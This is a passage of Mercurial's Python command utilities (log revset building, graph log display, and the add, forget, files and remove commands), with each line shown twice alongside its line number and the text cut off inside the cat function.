2380 opts['_patslog'] = list(pats)
2380 opts['_patslog'] = list(pats)
2381
2381
2382 filematcher = None
2382 filematcher = None
2383 if opts.get('patch') or opts.get('stat'):
2383 if opts.get('patch') or opts.get('stat'):
2384 # When following files, track renames via a special matcher.
2384 # When following files, track renames via a special matcher.
2385 # If we're forced to take the slowpath it means we're following
2385 # If we're forced to take the slowpath it means we're following
2386 # at least one pattern/directory, so don't bother with rename tracking.
2386 # at least one pattern/directory, so don't bother with rename tracking.
2387 if follow and not match.always() and not slowpath:
2387 if follow and not match.always() and not slowpath:
2388 # _makefollowlogfilematcher expects its files argument to be
2388 # _makefollowlogfilematcher expects its files argument to be
2389 # relative to the repo root, so use match.files(), not pats.
2389 # relative to the repo root, so use match.files(), not pats.
2390 filematcher = _makefollowlogfilematcher(repo, match.files(),
2390 filematcher = _makefollowlogfilematcher(repo, match.files(),
2391 followfirst)
2391 followfirst)
2392 else:
2392 else:
2393 filematcher = _makenofollowlogfilematcher(repo, pats, opts)
2393 filematcher = _makenofollowlogfilematcher(repo, pats, opts)
2394 if filematcher is None:
2394 if filematcher is None:
2395 filematcher = lambda rev: match
2395 filematcher = lambda rev: match
2396
2396
2397 expr = []
2397 expr = []
2398 for op, val in sorted(opts.iteritems()):
2398 for op, val in sorted(opts.iteritems()):
2399 if not val:
2399 if not val:
2400 continue
2400 continue
2401 if op not in opt2revset:
2401 if op not in opt2revset:
2402 continue
2402 continue
2403 revop, andor = opt2revset[op]
2403 revop, andor = opt2revset[op]
2404 if '%(val)' not in revop:
2404 if '%(val)' not in revop:
2405 expr.append(revop)
2405 expr.append(revop)
2406 else:
2406 else:
2407 if not isinstance(val, list):
2407 if not isinstance(val, list):
2408 e = revop % {'val': val}
2408 e = revop % {'val': val}
2409 else:
2409 else:
2410 e = '(' + andor.join((revop % {'val': v}) for v in val) + ')'
2410 e = '(' + andor.join((revop % {'val': v}) for v in val) + ')'
2411 expr.append(e)
2411 expr.append(e)
2412
2412
2413 if expr:
2413 if expr:
2414 expr = '(' + ' and '.join(expr) + ')'
2414 expr = '(' + ' and '.join(expr) + ')'
2415 else:
2415 else:
2416 expr = None
2416 expr = None
2417 return expr, filematcher
2417 return expr, filematcher
2418
2418
2419 def _logrevs(repo, opts):
2419 def _logrevs(repo, opts):
2420 # Default --rev value depends on --follow but --follow behavior
2420 # Default --rev value depends on --follow but --follow behavior
2421 # depends on revisions resolved from --rev...
2421 # depends on revisions resolved from --rev...
2422 follow = opts.get('follow') or opts.get('follow_first')
2422 follow = opts.get('follow') or opts.get('follow_first')
2423 if opts.get('rev'):
2423 if opts.get('rev'):
2424 revs = scmutil.revrange(repo, opts['rev'])
2424 revs = scmutil.revrange(repo, opts['rev'])
2425 elif follow and repo.dirstate.p1() == nullid:
2425 elif follow and repo.dirstate.p1() == nullid:
2426 revs = smartset.baseset()
2426 revs = smartset.baseset()
2427 elif follow:
2427 elif follow:
2428 revs = repo.revs('reverse(:.)')
2428 revs = repo.revs('reverse(:.)')
2429 else:
2429 else:
2430 revs = smartset.spanset(repo)
2430 revs = smartset.spanset(repo)
2431 revs.reverse()
2431 revs.reverse()
2432 return revs
2432 return revs
2433
2433
2434 def getgraphlogrevs(repo, pats, opts):
2434 def getgraphlogrevs(repo, pats, opts):
2435 """Return (revs, expr, filematcher) where revs is an iterable of
2435 """Return (revs, expr, filematcher) where revs is an iterable of
2436 revision numbers, expr is a revset string built from log options
2436 revision numbers, expr is a revset string built from log options
2437 and file patterns or None, and used to filter 'revs'. If --stat or
2437 and file patterns or None, and used to filter 'revs'. If --stat or
2438 --patch are not passed filematcher is None. Otherwise it is a
2438 --patch are not passed filematcher is None. Otherwise it is a
2439 callable taking a revision number and returning a match objects
2439 callable taking a revision number and returning a match objects
2440 filtering the files to be detailed when displaying the revision.
2440 filtering the files to be detailed when displaying the revision.
2441 """
2441 """
2442 limit = loglimit(opts)
2442 limit = loglimit(opts)
2443 revs = _logrevs(repo, opts)
2443 revs = _logrevs(repo, opts)
2444 if not revs:
2444 if not revs:
2445 return smartset.baseset(), None, None
2445 return smartset.baseset(), None, None
2446 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2446 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2447 if opts.get('rev'):
2447 if opts.get('rev'):
2448 # User-specified revs might be unsorted, but don't sort before
2448 # User-specified revs might be unsorted, but don't sort before
2449 # _makelogrevset because it might depend on the order of revs
2449 # _makelogrevset because it might depend on the order of revs
2450 if not (revs.isdescending() or revs.istopo()):
2450 if not (revs.isdescending() or revs.istopo()):
2451 revs.sort(reverse=True)
2451 revs.sort(reverse=True)
2452 if expr:
2452 if expr:
2453 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2453 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2454 revs = matcher(repo, revs)
2454 revs = matcher(repo, revs)
2455 if limit is not None:
2455 if limit is not None:
2456 limitedrevs = []
2456 limitedrevs = []
2457 for idx, rev in enumerate(revs):
2457 for idx, rev in enumerate(revs):
2458 if idx >= limit:
2458 if idx >= limit:
2459 break
2459 break
2460 limitedrevs.append(rev)
2460 limitedrevs.append(rev)
2461 revs = smartset.baseset(limitedrevs)
2461 revs = smartset.baseset(limitedrevs)
2462
2462
2463 return revs, expr, filematcher
2463 return revs, expr, filematcher
2464
2464
2465 def getlogrevs(repo, pats, opts):
2465 def getlogrevs(repo, pats, opts):
2466 """Return (revs, expr, filematcher) where revs is an iterable of
2466 """Return (revs, expr, filematcher) where revs is an iterable of
2467 revision numbers, expr is a revset string built from log options
2467 revision numbers, expr is a revset string built from log options
2468 and file patterns or None, and used to filter 'revs'. If --stat or
2468 and file patterns or None, and used to filter 'revs'. If --stat or
2469 --patch are not passed filematcher is None. Otherwise it is a
2469 --patch are not passed filematcher is None. Otherwise it is a
2470 callable taking a revision number and returning a match objects
2470 callable taking a revision number and returning a match objects
2471 filtering the files to be detailed when displaying the revision.
2471 filtering the files to be detailed when displaying the revision.
2472 """
2472 """
2473 limit = loglimit(opts)
2473 limit = loglimit(opts)
2474 revs = _logrevs(repo, opts)
2474 revs = _logrevs(repo, opts)
2475 if not revs:
2475 if not revs:
2476 return smartset.baseset([]), None, None
2476 return smartset.baseset([]), None, None
2477 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2477 expr, filematcher = _makelogrevset(repo, pats, opts, revs)
2478 if expr:
2478 if expr:
2479 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2479 matcher = revset.match(repo.ui, expr, order=revset.followorder)
2480 revs = matcher(repo, revs)
2480 revs = matcher(repo, revs)
2481 if limit is not None:
2481 if limit is not None:
2482 limitedrevs = []
2482 limitedrevs = []
2483 for idx, r in enumerate(revs):
2483 for idx, r in enumerate(revs):
2484 if limit <= idx:
2484 if limit <= idx:
2485 break
2485 break
2486 limitedrevs.append(r)
2486 limitedrevs.append(r)
2487 revs = smartset.baseset(limitedrevs)
2487 revs = smartset.baseset(limitedrevs)
2488
2488
2489 return revs, expr, filematcher
2489 return revs, expr, filematcher
2490
2490
2491 def _graphnodeformatter(ui, displayer):
2491 def _graphnodeformatter(ui, displayer):
2492 spec = ui.config('ui', 'graphnodetemplate')
2492 spec = ui.config('ui', 'graphnodetemplate')
2493 if not spec:
2493 if not spec:
2494 return templatekw.showgraphnode # fast path for "{graphnode}"
2494 return templatekw.showgraphnode # fast path for "{graphnode}"
2495
2495
2496 spec = templater.unquotestring(spec)
2496 spec = templater.unquotestring(spec)
2497 templ = formatter.maketemplater(ui, spec)
2497 templ = formatter.maketemplater(ui, spec)
2498 cache = {}
2498 cache = {}
2499 if isinstance(displayer, changeset_templater):
2499 if isinstance(displayer, changeset_templater):
2500 cache = displayer.cache # reuse cache of slow templates
2500 cache = displayer.cache # reuse cache of slow templates
2501 props = templatekw.keywords.copy()
2501 props = templatekw.keywords.copy()
2502 props['templ'] = templ
2502 props['templ'] = templ
2503 props['cache'] = cache
2503 props['cache'] = cache
2504 def formatnode(repo, ctx):
2504 def formatnode(repo, ctx):
2505 props['ctx'] = ctx
2505 props['ctx'] = ctx
2506 props['repo'] = repo
2506 props['repo'] = repo
2507 props['ui'] = repo.ui
2507 props['ui'] = repo.ui
2508 props['revcache'] = {}
2508 props['revcache'] = {}
2509 return templ.render(props)
2509 return templ.render(props)
2510 return formatnode
2510 return formatnode
2511
2511
2512 def displaygraph(ui, repo, dag, displayer, edgefn, getrenamed=None,
2512 def displaygraph(ui, repo, dag, displayer, edgefn, getrenamed=None,
2513 filematcher=None):
2513 filematcher=None):
2514 formatnode = _graphnodeformatter(ui, displayer)
2514 formatnode = _graphnodeformatter(ui, displayer)
2515 state = graphmod.asciistate()
2515 state = graphmod.asciistate()
2516 styles = state['styles']
2516 styles = state['styles']
2517
2517
2518 # only set graph styling if HGPLAIN is not set.
2518 # only set graph styling if HGPLAIN is not set.
2519 if ui.plain('graph'):
2519 if ui.plain('graph'):
2520 # set all edge styles to |, the default pre-3.8 behaviour
2520 # set all edge styles to |, the default pre-3.8 behaviour
2521 styles.update(dict.fromkeys(styles, '|'))
2521 styles.update(dict.fromkeys(styles, '|'))
2522 else:
2522 else:
2523 edgetypes = {
2523 edgetypes = {
2524 'parent': graphmod.PARENT,
2524 'parent': graphmod.PARENT,
2525 'grandparent': graphmod.GRANDPARENT,
2525 'grandparent': graphmod.GRANDPARENT,
2526 'missing': graphmod.MISSINGPARENT
2526 'missing': graphmod.MISSINGPARENT
2527 }
2527 }
2528 for name, key in edgetypes.items():
2528 for name, key in edgetypes.items():
2529 # experimental config: experimental.graphstyle.*
2529 # experimental config: experimental.graphstyle.*
2530 styles[key] = ui.config('experimental', 'graphstyle.%s' % name,
2530 styles[key] = ui.config('experimental', 'graphstyle.%s' % name,
2531 styles[key])
2531 styles[key])
2532 if not styles[key]:
2532 if not styles[key]:
2533 styles[key] = None
2533 styles[key] = None
2534
2534
2535 # experimental config: experimental.graphshorten
2535 # experimental config: experimental.graphshorten
2536 state['graphshorten'] = ui.configbool('experimental', 'graphshorten')
2536 state['graphshorten'] = ui.configbool('experimental', 'graphshorten')
2537
2537
2538 for rev, type, ctx, parents in dag:
2538 for rev, type, ctx, parents in dag:
2539 char = formatnode(repo, ctx)
2539 char = formatnode(repo, ctx)
2540 copies = None
2540 copies = None
2541 if getrenamed and ctx.rev():
2541 if getrenamed and ctx.rev():
2542 copies = []
2542 copies = []
2543 for fn in ctx.files():
2543 for fn in ctx.files():
2544 rename = getrenamed(fn, ctx.rev())
2544 rename = getrenamed(fn, ctx.rev())
2545 if rename:
2545 if rename:
2546 copies.append((fn, rename[0]))
2546 copies.append((fn, rename[0]))
2547 revmatchfn = None
2547 revmatchfn = None
2548 if filematcher is not None:
2548 if filematcher is not None:
2549 revmatchfn = filematcher(ctx.rev())
2549 revmatchfn = filematcher(ctx.rev())
2550 displayer.show(ctx, copies=copies, matchfn=revmatchfn)
2550 displayer.show(ctx, copies=copies, matchfn=revmatchfn)
2551 lines = displayer.hunk.pop(rev).split('\n')
2551 lines = displayer.hunk.pop(rev).split('\n')
2552 if not lines[-1]:
2552 if not lines[-1]:
2553 del lines[-1]
2553 del lines[-1]
2554 displayer.flush(ctx)
2554 displayer.flush(ctx)
2555 edges = edgefn(type, char, lines, state, rev, parents)
2555 edges = edgefn(type, char, lines, state, rev, parents)
2556 for type, char, lines, coldata in edges:
2556 for type, char, lines, coldata in edges:
2557 graphmod.ascii(ui, state, type, char, lines, coldata)
2557 graphmod.ascii(ui, state, type, char, lines, coldata)
2558 displayer.close()
2558 displayer.close()
2559
2559
2560 def graphlog(ui, repo, pats, opts):
2560 def graphlog(ui, repo, pats, opts):
2561 # Parameters are identical to log command ones
2561 # Parameters are identical to log command ones
2562 revs, expr, filematcher = getgraphlogrevs(repo, pats, opts)
2562 revs, expr, filematcher = getgraphlogrevs(repo, pats, opts)
2563 revdag = graphmod.dagwalker(repo, revs)
2563 revdag = graphmod.dagwalker(repo, revs)
2564
2564
2565 getrenamed = None
2565 getrenamed = None
2566 if opts.get('copies'):
2566 if opts.get('copies'):
2567 endrev = None
2567 endrev = None
2568 if opts.get('rev'):
2568 if opts.get('rev'):
2569 endrev = scmutil.revrange(repo, opts.get('rev')).max() + 1
2569 endrev = scmutil.revrange(repo, opts.get('rev')).max() + 1
2570 getrenamed = templatekw.getrenamedfn(repo, endrev=endrev)
2570 getrenamed = templatekw.getrenamedfn(repo, endrev=endrev)
2571
2571
2572 ui.pager('log')
2572 ui.pager('log')
2573 displayer = show_changeset(ui, repo, opts, buffered=True)
2573 displayer = show_changeset(ui, repo, opts, buffered=True)
2574 displaygraph(ui, repo, revdag, displayer, graphmod.asciiedges, getrenamed,
2574 displaygraph(ui, repo, revdag, displayer, graphmod.asciiedges, getrenamed,
2575 filematcher)
2575 filematcher)
2576
2576
2577 def checkunsupportedgraphflags(pats, opts):
2577 def checkunsupportedgraphflags(pats, opts):
2578 for op in ["newest_first"]:
2578 for op in ["newest_first"]:
2579 if op in opts and opts[op]:
2579 if op in opts and opts[op]:
2580 raise error.Abort(_("-G/--graph option is incompatible with --%s")
2580 raise error.Abort(_("-G/--graph option is incompatible with --%s")
2581 % op.replace("_", "-"))
2581 % op.replace("_", "-"))
2582
2582
2583 def graphrevs(repo, nodes, opts):
2583 def graphrevs(repo, nodes, opts):
2584 limit = loglimit(opts)
2584 limit = loglimit(opts)
2585 nodes.reverse()
2585 nodes.reverse()
2586 if limit is not None:
2586 if limit is not None:
2587 nodes = nodes[:limit]
2587 nodes = nodes[:limit]
2588 return graphmod.nodes(repo, nodes)
2588 return graphmod.nodes(repo, nodes)
2589
2589
2590 def add(ui, repo, match, prefix, explicitonly, **opts):
2590 def add(ui, repo, match, prefix, explicitonly, **opts):
2591 join = lambda f: os.path.join(prefix, f)
2591 join = lambda f: os.path.join(prefix, f)
2592 bad = []
2592 bad = []
2593
2593
2594 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2594 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2595 names = []
2595 names = []
2596 wctx = repo[None]
2596 wctx = repo[None]
2597 cca = None
2597 cca = None
2598 abort, warn = scmutil.checkportabilityalert(ui)
2598 abort, warn = scmutil.checkportabilityalert(ui)
2599 if abort or warn:
2599 if abort or warn:
2600 cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)
2600 cca = scmutil.casecollisionauditor(ui, abort, repo.dirstate)
2601
2601
2602 badmatch = matchmod.badmatch(match, badfn)
2602 badmatch = matchmod.badmatch(match, badfn)
2603 dirstate = repo.dirstate
2603 dirstate = repo.dirstate
2604 # We don't want to just call wctx.walk here, since it would return a lot of
2604 # We don't want to just call wctx.walk here, since it would return a lot of
2605 # clean files, which we aren't interested in and takes time.
2605 # clean files, which we aren't interested in and takes time.
2606 for f in sorted(dirstate.walk(badmatch, sorted(wctx.substate),
2606 for f in sorted(dirstate.walk(badmatch, sorted(wctx.substate),
2607 True, False, full=False)):
2607 True, False, full=False)):
2608 exact = match.exact(f)
2608 exact = match.exact(f)
2609 if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
2609 if exact or not explicitonly and f not in wctx and repo.wvfs.lexists(f):
2610 if cca:
2610 if cca:
2611 cca(f)
2611 cca(f)
2612 names.append(f)
2612 names.append(f)
2613 if ui.verbose or not exact:
2613 if ui.verbose or not exact:
2614 ui.status(_('adding %s\n') % match.rel(f))
2614 ui.status(_('adding %s\n') % match.rel(f))
2615
2615
2616 for subpath in sorted(wctx.substate):
2616 for subpath in sorted(wctx.substate):
2617 sub = wctx.sub(subpath)
2617 sub = wctx.sub(subpath)
2618 try:
2618 try:
2619 submatch = matchmod.subdirmatcher(subpath, match)
2619 submatch = matchmod.subdirmatcher(subpath, match)
2620 if opts.get(r'subrepos'):
2620 if opts.get(r'subrepos'):
2621 bad.extend(sub.add(ui, submatch, prefix, False, **opts))
2621 bad.extend(sub.add(ui, submatch, prefix, False, **opts))
2622 else:
2622 else:
2623 bad.extend(sub.add(ui, submatch, prefix, True, **opts))
2623 bad.extend(sub.add(ui, submatch, prefix, True, **opts))
2624 except error.LookupError:
2624 except error.LookupError:
2625 ui.status(_("skipping missing subrepository: %s\n")
2625 ui.status(_("skipping missing subrepository: %s\n")
2626 % join(subpath))
2626 % join(subpath))
2627
2627
2628 if not opts.get(r'dry_run'):
2628 if not opts.get(r'dry_run'):
2629 rejected = wctx.add(names, prefix)
2629 rejected = wctx.add(names, prefix)
2630 bad.extend(f for f in rejected if f in match.files())
2630 bad.extend(f for f in rejected if f in match.files())
2631 return bad
2631 return bad
2632
2632
2633 def addwebdirpath(repo, serverpath, webconf):
2633 def addwebdirpath(repo, serverpath, webconf):
2634 webconf[serverpath] = repo.root
2634 webconf[serverpath] = repo.root
2635 repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))
2635 repo.ui.debug('adding %s = %s\n' % (serverpath, repo.root))
2636
2636
2637 for r in repo.revs('filelog("path:.hgsub")'):
2637 for r in repo.revs('filelog("path:.hgsub")'):
2638 ctx = repo[r]
2638 ctx = repo[r]
2639 for subpath in ctx.substate:
2639 for subpath in ctx.substate:
2640 ctx.sub(subpath).addwebdirpath(serverpath, webconf)
2640 ctx.sub(subpath).addwebdirpath(serverpath, webconf)
2641
2641
2642 def forget(ui, repo, match, prefix, explicitonly):
2642 def forget(ui, repo, match, prefix, explicitonly):
2643 join = lambda f: os.path.join(prefix, f)
2643 join = lambda f: os.path.join(prefix, f)
2644 bad = []
2644 bad = []
2645 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2645 badfn = lambda x, y: bad.append(x) or match.bad(x, y)
2646 wctx = repo[None]
2646 wctx = repo[None]
2647 forgot = []
2647 forgot = []
2648
2648
2649 s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
2649 s = repo.status(match=matchmod.badmatch(match, badfn), clean=True)
2650 forget = sorted(s.modified + s.added + s.deleted + s.clean)
2650 forget = sorted(s.modified + s.added + s.deleted + s.clean)
2651 if explicitonly:
2651 if explicitonly:
2652 forget = [f for f in forget if match.exact(f)]
2652 forget = [f for f in forget if match.exact(f)]
2653
2653
2654 for subpath in sorted(wctx.substate):
2654 for subpath in sorted(wctx.substate):
2655 sub = wctx.sub(subpath)
2655 sub = wctx.sub(subpath)
2656 try:
2656 try:
2657 submatch = matchmod.subdirmatcher(subpath, match)
2657 submatch = matchmod.subdirmatcher(subpath, match)
2658 subbad, subforgot = sub.forget(submatch, prefix)
2658 subbad, subforgot = sub.forget(submatch, prefix)
2659 bad.extend([subpath + '/' + f for f in subbad])
2659 bad.extend([subpath + '/' + f for f in subbad])
2660 forgot.extend([subpath + '/' + f for f in subforgot])
2660 forgot.extend([subpath + '/' + f for f in subforgot])
2661 except error.LookupError:
2661 except error.LookupError:
2662 ui.status(_("skipping missing subrepository: %s\n")
2662 ui.status(_("skipping missing subrepository: %s\n")
2663 % join(subpath))
2663 % join(subpath))
2664
2664
2665 if not explicitonly:
2665 if not explicitonly:
2666 for f in match.files():
2666 for f in match.files():
2667 if f not in repo.dirstate and not repo.wvfs.isdir(f):
2667 if f not in repo.dirstate and not repo.wvfs.isdir(f):
2668 if f not in forgot:
2668 if f not in forgot:
2669 if repo.wvfs.exists(f):
2669 if repo.wvfs.exists(f):
2670 # Don't complain if the exact case match wasn't given.
2670 # Don't complain if the exact case match wasn't given.
2671 # But don't do this until after checking 'forgot', so
2671 # But don't do this until after checking 'forgot', so
2672 # that subrepo files aren't normalized, and this op is
2672 # that subrepo files aren't normalized, and this op is
2673 # purely from data cached by the status walk above.
2673 # purely from data cached by the status walk above.
2674 if repo.dirstate.normalize(f) in repo.dirstate:
2674 if repo.dirstate.normalize(f) in repo.dirstate:
2675 continue
2675 continue
2676 ui.warn(_('not removing %s: '
2676 ui.warn(_('not removing %s: '
2677 'file is already untracked\n')
2677 'file is already untracked\n')
2678 % match.rel(f))
2678 % match.rel(f))
2679 bad.append(f)
2679 bad.append(f)
2680
2680
2681 for f in forget:
2681 for f in forget:
2682 if ui.verbose or not match.exact(f):
2682 if ui.verbose or not match.exact(f):
2683 ui.status(_('removing %s\n') % match.rel(f))
2683 ui.status(_('removing %s\n') % match.rel(f))
2684
2684
2685 rejected = wctx.forget(forget, prefix)
2685 rejected = wctx.forget(forget, prefix)
2686 bad.extend(f for f in rejected if f in match.files())
2686 bad.extend(f for f in rejected if f in match.files())
2687 forgot.extend(f for f in forget if f not in rejected)
2687 forgot.extend(f for f in forget if f not in rejected)
2688 return bad, forgot
2688 return bad, forgot
2689
2689
2690 def files(ui, ctx, m, fm, fmt, subrepos):
2690 def files(ui, ctx, m, fm, fmt, subrepos):
2691 rev = ctx.rev()
2691 rev = ctx.rev()
2692 ret = 1
2692 ret = 1
2693 ds = ctx.repo().dirstate
2693 ds = ctx.repo().dirstate
2694
2694
2695 for f in ctx.matches(m):
2695 for f in ctx.matches(m):
2696 if rev is None and ds[f] == 'r':
2696 if rev is None and ds[f] == 'r':
2697 continue
2697 continue
2698 fm.startitem()
2698 fm.startitem()
2699 if ui.verbose:
2699 if ui.verbose:
2700 fc = ctx[f]
2700 fc = ctx[f]
2701 fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
2701 fm.write('size flags', '% 10d % 1s ', fc.size(), fc.flags())
2702 fm.data(abspath=f)
2702 fm.data(abspath=f)
2703 fm.write('path', fmt, m.rel(f))
2703 fm.write('path', fmt, m.rel(f))
2704 ret = 0
2704 ret = 0
2705
2705
2706 for subpath in sorted(ctx.substate):
2706 for subpath in sorted(ctx.substate):
2707 submatch = matchmod.subdirmatcher(subpath, m)
2707 submatch = matchmod.subdirmatcher(subpath, m)
2708 if (subrepos or m.exact(subpath) or any(submatch.files())):
2708 if (subrepos or m.exact(subpath) or any(submatch.files())):
2709 sub = ctx.sub(subpath)
2709 sub = ctx.sub(subpath)
2710 try:
2710 try:
2711 recurse = m.exact(subpath) or subrepos
2711 recurse = m.exact(subpath) or subrepos
2712 if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
2712 if sub.printfiles(ui, submatch, fm, fmt, recurse) == 0:
2713 ret = 0
2713 ret = 0
2714 except error.LookupError:
2714 except error.LookupError:
2715 ui.status(_("skipping missing subrepository: %s\n")
2715 ui.status(_("skipping missing subrepository: %s\n")
2716 % m.abs(subpath))
2716 % m.abs(subpath))
2717
2717
2718 return ret
2718 return ret
2719
2719
2720 def remove(ui, repo, m, prefix, after, force, subrepos, warnings=None):
2720 def remove(ui, repo, m, prefix, after, force, subrepos, warnings=None):
2721 join = lambda f: os.path.join(prefix, f)
2721 join = lambda f: os.path.join(prefix, f)
2722 ret = 0
2722 ret = 0
2723 s = repo.status(match=m, clean=True)
2723 s = repo.status(match=m, clean=True)
2724 modified, added, deleted, clean = s[0], s[1], s[3], s[6]
2724 modified, added, deleted, clean = s[0], s[1], s[3], s[6]
2725
2725
2726 wctx = repo[None]
2726 wctx = repo[None]
2727
2727
2728 if warnings is None:
2728 if warnings is None:
2729 warnings = []
2729 warnings = []
2730 warn = True
2730 warn = True
2731 else:
2731 else:
2732 warn = False
2732 warn = False
2733
2733
2734 subs = sorted(wctx.substate)
2734 subs = sorted(wctx.substate)
2735 total = len(subs)
2735 total = len(subs)
2736 count = 0
2736 count = 0
2737 for subpath in subs:
2737 for subpath in subs:
2738 count += 1
2738 count += 1
2739 submatch = matchmod.subdirmatcher(subpath, m)
2739 submatch = matchmod.subdirmatcher(subpath, m)
2740 if subrepos or m.exact(subpath) or any(submatch.files()):
2740 if subrepos or m.exact(subpath) or any(submatch.files()):
2741 ui.progress(_('searching'), count, total=total, unit=_('subrepos'))
2741 ui.progress(_('searching'), count, total=total, unit=_('subrepos'))
2742 sub = wctx.sub(subpath)
2742 sub = wctx.sub(subpath)
2743 try:
2743 try:
2744 if sub.removefiles(submatch, prefix, after, force, subrepos,
2744 if sub.removefiles(submatch, prefix, after, force, subrepos,
2745 warnings):
2745 warnings):
2746 ret = 1
2746 ret = 1
2747 except error.LookupError:
2747 except error.LookupError:
2748 warnings.append(_("skipping missing subrepository: %s\n")
2748 warnings.append(_("skipping missing subrepository: %s\n")
2749 % join(subpath))
2749 % join(subpath))
2750 ui.progress(_('searching'), None)
2750 ui.progress(_('searching'), None)
2751
2751
2752 # warn about failure to delete explicit files/dirs
2752 # warn about failure to delete explicit files/dirs
2753 deleteddirs = util.dirs(deleted)
2753 deleteddirs = util.dirs(deleted)
2754 files = m.files()
2754 files = m.files()
2755 total = len(files)
2755 total = len(files)
2756 count = 0
2756 count = 0
2757 for f in files:
2757 for f in files:
2758 def insubrepo():
2758 def insubrepo():
2759 for subpath in wctx.substate:
2759 for subpath in wctx.substate:
2760 if f.startswith(subpath + '/'):
2760 if f.startswith(subpath + '/'):
2761 return True
2761 return True
2762 return False
2762 return False
2763
2763
2764 count += 1
2764 count += 1
2765 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2765 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2766 isdir = f in deleteddirs or wctx.hasdir(f)
2766 isdir = f in deleteddirs or wctx.hasdir(f)
2767 if (f in repo.dirstate or isdir or f == '.'
2767 if (f in repo.dirstate or isdir or f == '.'
2768 or insubrepo() or f in subs):
2768 or insubrepo() or f in subs):
2769 continue
2769 continue
2770
2770
2771 if repo.wvfs.exists(f):
2771 if repo.wvfs.exists(f):
2772 if repo.wvfs.isdir(f):
2772 if repo.wvfs.isdir(f):
2773 warnings.append(_('not removing %s: no tracked files\n')
2773 warnings.append(_('not removing %s: no tracked files\n')
2774 % m.rel(f))
2774 % m.rel(f))
2775 else:
2775 else:
2776 warnings.append(_('not removing %s: file is untracked\n')
2776 warnings.append(_('not removing %s: file is untracked\n')
2777 % m.rel(f))
2777 % m.rel(f))
2778 # missing files will generate a warning elsewhere
2778 # missing files will generate a warning elsewhere
2779 ret = 1
2779 ret = 1
2780 ui.progress(_('deleting'), None)
2780 ui.progress(_('deleting'), None)
2781
2781
2782 if force:
2782 if force:
2783 list = modified + deleted + clean + added
2783 list = modified + deleted + clean + added
2784 elif after:
2784 elif after:
2785 list = deleted
2785 list = deleted
2786 remaining = modified + added + clean
2786 remaining = modified + added + clean
2787 total = len(remaining)
2787 total = len(remaining)
2788 count = 0
2788 count = 0
2789 for f in remaining:
2789 for f in remaining:
2790 count += 1
2790 count += 1
2791 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2791 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2792 warnings.append(_('not removing %s: file still exists\n')
2792 warnings.append(_('not removing %s: file still exists\n')
2793 % m.rel(f))
2793 % m.rel(f))
2794 ret = 1
2794 ret = 1
2795 ui.progress(_('skipping'), None)
2795 ui.progress(_('skipping'), None)
2796 else:
2796 else:
2797 list = deleted + clean
2797 list = deleted + clean
2798 total = len(modified) + len(added)
2798 total = len(modified) + len(added)
2799 count = 0
2799 count = 0
2800 for f in modified:
2800 for f in modified:
2801 count += 1
2801 count += 1
2802 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2802 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2803 warnings.append(_('not removing %s: file is modified (use -f'
2803 warnings.append(_('not removing %s: file is modified (use -f'
2804 ' to force removal)\n') % m.rel(f))
2804 ' to force removal)\n') % m.rel(f))
2805 ret = 1
2805 ret = 1
2806 for f in added:
2806 for f in added:
2807 count += 1
2807 count += 1
2808 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2808 ui.progress(_('skipping'), count, total=total, unit=_('files'))
2809 warnings.append(_("not removing %s: file has been marked for add"
2809 warnings.append(_("not removing %s: file has been marked for add"
2810 " (use 'hg forget' to undo add)\n") % m.rel(f))
2810 " (use 'hg forget' to undo add)\n") % m.rel(f))
2811 ret = 1
2811 ret = 1
2812 ui.progress(_('skipping'), None)
2812 ui.progress(_('skipping'), None)
2813
2813
2814 list = sorted(list)
2814 list = sorted(list)
2815 total = len(list)
2815 total = len(list)
2816 count = 0
2816 count = 0
2817 for f in list:
2817 for f in list:
2818 count += 1
2818 count += 1
2819 if ui.verbose or not m.exact(f):
2819 if ui.verbose or not m.exact(f):
2820 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2820 ui.progress(_('deleting'), count, total=total, unit=_('files'))
2821 ui.status(_('removing %s\n') % m.rel(f))
2821 ui.status(_('removing %s\n') % m.rel(f))
2822 ui.progress(_('deleting'), None)
2822 ui.progress(_('deleting'), None)
2823
2823
2824 with repo.wlock():
2824 with repo.wlock():
2825 if not after:
2825 if not after:
2826 for f in list:
2826 for f in list:
2827 if f in added:
2827 if f in added:
2828 continue # we never unlink added files on remove
2828 continue # we never unlink added files on remove
2829 repo.wvfs.unlinkpath(f, ignoremissing=True)
2829 repo.wvfs.unlinkpath(f, ignoremissing=True)
2830 repo[None].forget(list)
2830 repo[None].forget(list)
2831
2831
2832 if warn:
2832 if warn:
2833 for warning in warnings:
2833 for warning in warnings:
2834 ui.warn(warning)
2834 ui.warn(warning)
2835
2835
2836 return ret
2836 return ret
2837
2837
2838 def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
2838 def cat(ui, repo, ctx, matcher, basefm, fntemplate, prefix, **opts):
2839 err = 1
2839 err = 1
2840
2840
2841 def write(path):
2841 def write(path):
2842 filename = None
2842 filename = None
2843 if fntemplate:
2843 if fntemplate:
2844 filename = makefilename(repo, fntemplate, ctx.node(),
2844 filename = makefilename(repo, fntemplate, ctx.node(),
2845 pathname=os.path.join(prefix, path))
2845 pathname=os.path.join(prefix, path))
2846 with formatter.maybereopen(basefm, filename, opts) as fm:
2846 with formatter.maybereopen(basefm, filename, opts) as fm:
2847 data = ctx[path].data()
2847 data = ctx[path].data()
2848 if opts.get('decode'):
2848 if opts.get('decode'):
